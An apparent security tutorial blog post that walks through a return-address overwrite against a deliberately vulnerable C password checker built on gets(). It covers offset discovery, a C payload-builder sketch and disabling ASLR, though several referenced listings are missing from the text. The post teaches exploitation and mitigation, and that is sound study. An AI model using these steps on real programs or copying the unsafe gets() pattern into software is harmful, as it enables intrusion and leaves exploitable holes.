Understanding Buffer Overrun Exploits
25 Oct 2024
Introduction
Buffer overrun exploits (also known as buffer overflow attacks) are one of the most well-known and dangerous types of vulnerabilities in software security. These exploits take advantage of how a program manages memory—specifically, by writing more data to a buffer (an allocated block of memory) than it can safely hold. When this happens, the excess data can overwrite adjacent memory locations, potentially altering the program’s control flow or causing it to behave unpredictably.
Attackers can exploit buffer overruns to inject malicious code or manipulate the system to execute arbitrary instructions, often gaining unauthorized access to the target system. Despite being a well-studied vulnerability, buffer overflows remain relevant today, particularly in low-level languages like C and C++, which allow direct memory manipulation.
In this post, we’ll take a closer look at buffer overrun exploits and how they work, and walk through some real-world code examples in C that demonstrate this vulnerability. By understanding the mechanics behind buffer overflows, we can also better understand how to mitigate them.
Disclaimer: The code in this article is purely for demonstration purposes. We use some intentionally unsafe techniques to set up an exploitable scenario. DO NOT use this code in production applications, ever.
Password Validator Example
In the following example, the program will ask for input from the user and validate it against a password stored on the server.
do_super_admin_things is the protected function in our example. It might be an admin shell, or something else. The point is that this program is trying to control access to that function by making sure you have the password first!
The validate_password function is responsible for getting that password in from the outside world. It prompts, and then reads from stdin. Note the use of gets().
Warning About gets
The usage of gets() here is highly frowned upon because of how insecure it is. Below are notes from the man page for it:
BUGS Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead.
The Library Functions Manual makes it clear. It’s such a horrible function security-wise that C11 removed it entirely, after C99 (in Technical Corrigendum 3) had already deprecated it as per §7.26.9:
The gets function is obsolescent, and is deprecated.
If there’s one thing to learn from this section, it’s this: don’t use gets().
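As a rough sketch of what the man page's "use fgets() instead" advice can look like, here is a small bounded line reader. The helper name read_line and its return codes are our own invention for illustration, not part of the original program.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Reads one line from `in` into `buf`, never writing more than `size` bytes.
 * Returns 0 on success, 1 if the line was too long and had to be truncated
 * (the rest of the line is discarded), and -1 on EOF or error. */
int read_line(FILE *in, char *buf, size_t size)
{
    assert(in != NULL && buf != NULL);
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;

    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';    /* strip the newline that fgets() keeps */
        return 0;
    }

    /* No newline in the buffer: either the line fit exactly, EOF ended it,
     * or the input was too long. Drain whatever is left of this line. */
    int c, truncated = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        truncated = 1;
    return truncated;
}
```

Unlike gets(), the caller states the buffer size up front, so an oversized attempt is cut off instead of spilling into neighbouring memory.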
To get this code to compile, I had to relax some of the standard rules and mute certain warnings:
Checking the Password
The check_password function reads a file from disk that contains the super-secret password, then compares the attempt to the correct password.
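A function of this shape might look roughly like the sketch below. It is only an approximation of the idea: it takes an already opened stream rather than a file name, and the MAX_PASSWORD limit is an assumption, so the real listing may differ in its details.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

#define MAX_PASSWORD 64   /* assumed limit on the stored password length */

/* Returns 1 if `attempt` equals the first line of `secret`, 0 otherwise. */
int check_password(const char *attempt, FILE *secret)
{
    char expected[MAX_PASSWORD];

    assert(attempt != NULL && secret != NULL);
    if (fgets(expected, sizeof expected, secret) == NULL)
        return 0;                               /* unreadable or empty file: deny */

    expected[strcspn(expected, "\n")] = '\0';   /* drop the trailing newline */
    return strcmp(attempt, expected) == 0;
}
```

Note that the comparison itself is perfectly safe. The weakness in this program lies in how the attempt is read, not in how it is checked.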
Crashes
Initially, if you provide any normal input, the program behaves as expected:
But if you push the input a bit further, exceeding the bounds of the password_attempt buffer, you can trigger a crash:
The program crashes due to a segmentation fault. Checking dmesg gives us more information:
Notice the 41414141 pattern. This is significant because it shows that the capital A’s from our input (0x41 in hexadecimal) are making their way into the instruction pointer (ip). The input we provided has overflowed into crucial parts of the stack, including the saved return address that gets loaded into the instruction pointer.
You can verify that 0x41 represents ‘A’ by running the following command:
Controlling the Instruction Pointer
This works because the large input string is overflowing the password_attempt buffer. This buffer is a local variable in the validate_password function, and on the stack, local variables are stored just below the return address. When password_attempt overflows, the excess data overwrites the return address on the stack. Once overwritten, we control what address the CPU will jump to after validate_password finishes.
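To make that layout concrete without actually corrupting a real stack, we can model the frame as a plain byte array. This is a simplified sketch: the 12-byte gap between the buffer and the return address is an assumption, and the fake_frame type and its helpers are hypothetical names used only here.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define BUF_SIZE   64                     /* size of password_attempt */
#define GAP_SIZE   12                     /* assumed: saved registers/padding */
#define RET_OFFSET (BUF_SIZE + GAP_SIZE)
#define FRAME_SIZE (RET_OFFSET + sizeof(uint32_t))

/* A byte array standing in for the stack frame: the buffer comes first,
 * the return address sits above it at higher addresses. */
struct fake_frame {
    unsigned char bytes[FRAME_SIZE];
};

void frame_init(struct fake_frame *f, uint32_t return_address)
{
    assert(f != NULL);
    memset(f->bytes, 0, FRAME_SIZE);
    memcpy(f->bytes + RET_OFFSET, &return_address, sizeof return_address);
}

/* Mimics an unchecked copy into the buffer. The copy is clamped to the size
 * of the model so that this sketch itself stays memory-safe. */
void frame_unchecked_copy(struct fake_frame *f, const void *input, size_t len)
{
    assert(f != NULL && input != NULL);
    if (len > FRAME_SIZE)
        len = FRAME_SIZE;
    memcpy(f->bytes, input, len);
}

uint32_t frame_return_address(const struct fake_frame *f)
{
    uint32_t addr;
    memcpy(&addr, f->bytes + RET_OFFSET, sizeof addr);
    return addr;
}
```

Copying 64 bytes leaves the stored return address untouched, while copying 80 bytes of A’s turns it into 0x41414141, which is exactly the value that showed up in dmesg.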
Maybe we could find the address of the do_super_admin_things function and simply jump directly to it. To do this, we need to find the address. Only the name of the function is available to us in the source code; its address is determined when the program is compiled and linked, so we need to lean on some other tools to gather this intel.
By using objdump we can take a look inside of the compiled executable and get this information.
This will disassemble the vuln1 program and give us the location of each of the functions. We search for the function that we want (do_super_admin_things):
We find that it’s at address 00001316. We need to take note of this value as we’ll need it shortly.
Now we need to find exactly where in our input the return address gets overwritten, so that we know where to place our own address. We’ve already got some inside knowledge about our buffer: it’s 64 bytes in length.
We need a marker in the input so we can determine where to place our address. We can do that with some well-known payload data. We re-run the program with our 64 A’s, but this time we add a pattern of characters afterwards:
This segfaults again, but you can see the BBBBCCCCDDDDEEEEFFFF at the end of the 64 A’s. Looking at the log in dmesg now:
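The 45454545 tells us which part of the input ends up as the return address. \x45 is the letter E, so the four E’s are what gets loaded into the instruction pointer. They sit at offset 76 in our input (64 A’s, then BBBB, CCCC, and DDDD), which means the address we want to inject has to start where the E’s are.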
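The lookup we just did by eye can be sketched in a few lines of C. The helper below is hypothetical and assumes a 32-bit little-endian target, which is what the 8-digit ip values in dmesg suggest.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Returns the offset in `input` of the 4 bytes that, read as a little-endian
 * 32-bit value, equal `ip`. Returns -1 if they do not occur. */
long find_ip_offset(const unsigned char *input, size_t len, uint32_t ip)
{
    unsigned char needle[4];

    assert(input != NULL);
    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)(ip >> (8 * i));   /* least significant byte first */

    for (size_t i = 0; i + sizeof needle <= len; i++)
        if (memcmp(input + i, needle, sizeof needle) == 0)
            return (long)i;
    return -1;
}
```

For 64 A’s followed by BBBBCCCCDDDDEEEEFFFF and a faulting ip of 0x45454545, it reports offset 76: the 64 A’s plus the 12 bytes of B, C, and D.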
Prepare the Payload
To make life easier, we’ll write a Python script that generates this payload for us. Note that it uses the function address we found earlier.
We can now inject this into the execution of our binary and achieve a shell:
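We use (python3 payload.py; cat) here to keep the pipe open. If we simply piped the script’s output into the program, the pipe would close as soon as the script exited, and anything launched by do_super_admin_things would see end-of-file on stdin and exit immediately. The trailing cat keeps stdin open and forwards whatever we type.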
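The payload itself is nothing more than padding followed by an address. The post builds it with a Python script; purely as an illustration, the same construction can be sketched in C. The build_payload helper is a hypothetical name, and it assumes a 32-bit little-endian target with the return address at the offset found above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Fills `out` with `offset` filler bytes, the target address in little-endian
 * order, and a newline to terminate the line that gets() reads.
 * Returns the payload length, or 0 if `out` is too small. */
size_t build_payload(unsigned char *out, size_t cap, size_t offset, uint32_t target)
{
    size_t total = offset + sizeof target + 1;

    assert(out != NULL);
    if (cap < total)
        return 0;

    memset(out, 'A', offset);                     /* padding up to the return address */
    for (size_t i = 0; i < sizeof target; i++)    /* least significant byte first */
        out[offset + i] = (unsigned char)(target >> (8 * i));
    out[offset + sizeof target] = '\n';
    return total;
}
```

When emitting the result, write it with fwrite() rather than printf("%s"), since the address may contain zero bytes. The address must not contain the byte 0x0a, though, because gets() stops reading at the first newline.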
Static vs. Runtime Addresses
When we run our program normally, modern operating systems apply Address Space Layout Randomization (ASLR), which shifts memory locations randomly each time the program starts. ASLR is a security feature that makes it more challenging for exploits to rely on hardcoded memory addresses, because the memory layout changes every time the program is loaded.
For example, if we inspect the runtime address of do_super_admin_things in GDB, we might see something like:
This differs from the objdump address 0x1316, as it’s been shifted by the base address at which the executable was loaded (e.g., 0x56555000 in this case). With ASLR enabled, that base address changes on every run.
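The relationship between the two addresses is simple arithmetic, sketched below with hypothetical helper names. It assumes a position-independent 32-bit executable, where objdump shows offsets relative to the load base.

```c
#include <assert.h>
#include <stdint.h>

/* Runtime address of a symbol: the load base chosen by the loader plus the
 * static offset reported by objdump. */
uint32_t runtime_address(uint32_t load_base, uint32_t static_offset)
{
    assert(load_base <= UINT32_MAX - static_offset);   /* no wraparound */
    return load_base + static_offset;
}

/* The inverse: recover the load base from one known runtime address. */
uint32_t load_base_of(uint32_t runtime_addr, uint32_t static_offset)
{
    assert(runtime_addr >= static_offset);
    return runtime_addr - static_offset;
}
```

With the example base 0x56555000 and the offset 0x1316 that objdump reported earlier, runtime_address gives 0x56556316. Going the other way, a single leaked runtime address is enough to recover the base, which is why ASLR only helps as long as no address leaks.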
Temporarily Disabling ASLR for Demonstration
To make runtime addresses predictable from the objdump output, we can temporarily disable ASLR. This makes the program load at consistent addresses, which is useful for demonstration and testing purposes.
To disable ASLR on Linux, write 0 to /proc/sys/kernel/randomize_va_space as root. This disables ASLR system-wide, so be sure to re-enable it after testing by setting the value back to 2.
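Before and after testing, it can be worth checking which mode the system is actually in. On Linux the setting lives in /proc/sys/kernel/randomize_va_space; the sketch below parses it from an already opened stream. The function names are hypothetical and the mode descriptions are abbreviated.

```c
#include <assert.h>
#include <stdio.h>

/* Reads the integer stored in an open randomize_va_space stream.
 * Returns the mode (0, 1 or 2), or -1 if it cannot be parsed. */
int read_aslr_mode(FILE *fp)
{
    int mode;

    assert(fp != NULL);
    if (fscanf(fp, "%d", &mode) != 1 || mode < 0 || mode > 2)
        return -1;
    return mode;
}

/* Short human-readable description of each mode. */
const char *aslr_mode_name(int mode)
{
    switch (mode) {
    case 0:  return "disabled";
    case 1:  return "partial (stack, mmap, vDSO)";
    case 2:  return "full (also heap)";
    default: return "unknown";
    }
}
```

A caller would open the file with fopen("/proc/sys/kernel/randomize_va_space", "r"), pass the stream to read_aslr_mode, and confirm that it reports 2 again once the experiment is over.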
Conclusion
In this post, we explored the mechanics of buffer overflow exploits, walked through a real-world example in C, and demonstrated how ASLR impacts the addresses used in an exploit. By leveraging objdump, we could inspect static addresses, but we also noted how runtime address randomization, through ASLR, makes these addresses unpredictable.
Disabling ASLR temporarily allowed us to match objdump addresses to those at runtime, making the exploit demonstration clearer. However, this feature highlights why modern systems adopt ASLR: by shifting memory locations each time a program runs, ASLR makes it significantly more difficult for attackers to execute hardcoded exploits reliably.
Understanding and practicing secure coding, such as avoiding vulnerable functions like gets() and implementing stack protections, is crucial in preventing such exploits. Combined with ASLR and other modern defenses, these practices create a layered approach to security, significantly enhancing the resilience of software.
Buffer overflows remain a classic but essential area of study in software security. By thoroughly understanding their mechanisms and challenges, developers and security researchers can better protect systems from these types of attacks.